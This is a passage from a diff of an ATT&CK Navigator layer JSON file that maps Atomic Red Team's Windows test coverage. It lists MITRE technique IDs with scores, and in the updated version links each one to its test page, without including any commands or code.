enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":
100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":10
0,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,
"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled"
:true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}
,{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryc
o/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomi
c-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-t
eam/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001
.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redc
